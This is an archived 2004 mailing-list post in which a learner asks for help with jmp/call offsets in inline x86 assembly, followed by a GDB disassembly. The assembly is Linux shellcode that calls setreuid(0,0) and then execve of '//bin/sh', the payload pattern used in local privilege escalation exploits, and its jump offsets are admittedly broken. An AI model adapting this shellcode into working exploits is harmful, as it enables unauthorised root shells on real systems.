CALL too posision
From: Xenzeo (xenzeo-nospam001_at_blackhat.dk)
Date: 04/23/04
- Previous message: Grumble: "Re: write system call"
- Next in thread: T.M. Sommers: "Re: CALL too posision"
- Reply: T.M. Sommers: "Re: CALL too posision"
- Reply: Frank Kotler: "Re: CALL too posision"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Date: Fri, 23 Apr 2004 18:07:30 +0000 (UTC)
Hey guys...
I'm currently trying too learn the art of writing ASM code...
Anyway, i have come across a bit of a problem, when writing the asm code for a shell i want too spawn.. I have no problem in spawning the shell but i do have a problem with the first JMP and the last CALL operation, i can't get it too reconize the right posision...
code:
int main() {
__asm__(
"jmp 0x10\n" // 5
"xorl %ebx, %ebx\n" // 2
"xorl %ecx, %ecx\n" // 2
"mov $0x46, %eax\n" // 5
"int $0x80\n" // 2
"xor %eax, %eax\n" // 2
"push %eax\n" // 1
"pushl $0x68732f6e\n" // 5
"pushl $0x69622f2f\n" // 5
"mov %esp, %ebx\n" // 2
"lea 0x8(%esp,1), %edx\n" // 4
"push %eax\n" // 1
"push %ebx\n" // 1
"lea (%esp,1), %ecx\n" // 3
"mov $0xb, %eax\n" // 5
"int $0x80\n" // 2
"xor %eax, %eax\n" // 2
"mov $0x01, %eax\n" // 5
"int $0x80\n" // 2
"call -0x38\n" // 5
);
}
--- code ---
When i compile this, and try to run it, i get a "Sigmentation Fault", caused by the JMP or CALL opcode...
If those are removed it spawn's a shell...
Output from GDB:
(gdb) disas main
Dump of assembler code for function main:
0x08048354 <main+0>: push %ebp
0x08048355 <main+1>: mov %esp,%ebp
0x08048357 <main+3>: sub $0x8,%esp
0x0804835a <main+6>: and $0xfffffff0,%esp
0x0804835d <main+9>: mov $0x0,%eax
0x08048362 <main+14>: sub %eax,%esp
0x08048364 <main+16>: jmp 0x3d
0x08048369 <main+21>: xor %ebx,%ebx
0x0804836b <main+23>: xor %ecx,%ecx
0x0804836d <main+25>: mov $0x46,%eax
0x08048372 <main+30>: int $0x80
0x08048374 <main+32>: xor %eax,%eax
0x08048376 <main+34>: push %eax
0x08048377 <main+35>: push $0x68732f6e
0x0804837c <main+40>: push $0x69622f2f
0x08048381 <main+45>: mov %esp,%ebx
0x08048383 <main+47>: lea 0x8(%esp),%edx
0x08048387 <main+51>: push %eax
0x08048388 <main+52>: push %ebx
0x08048389 <main+53>: lea (%esp),%ecx
0x0804838c <main+56>: mov $0xb,%eax
0x08048391 <main+61>: int $0x80
0x08048393 <main+63>: xor %eax,%eax
0x08048395 <main+65>: mov $0x1,%eax
0x0804839a <main+70>: int $0x80
0x0804839c <main+72>: call 0xffffffc8
0x080483a1 <main+77>: leave
0x080483a2 <main+78>: ret
End of assembler dump.
(gdb)
--- GDB ---
So it starts from main+16, anything weird in this? Guides i have read do not have the same result...
Anyway, my CALL operation does not refer to the right address "0x08048369" but "0xffffffc8" i belive this is my problem, but i can't find any solution too this problem....
My GCC version:
gcc version 3.3.3 20040217 (Gentoo Linux 3.3.3, propolice-3.3-7)
Any help or suggestions would be appriciated..
-Xenzeo
- Previous message: Grumble: "Re: write system call"
- Next in thread: T.M. Sommers: "Re: CALL too posision"
- Reply: T.M. Sommers: "Re: CALL too posision"
- Reply: Frank Kotler: "Re: CALL too posision"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Relevant Pages
|
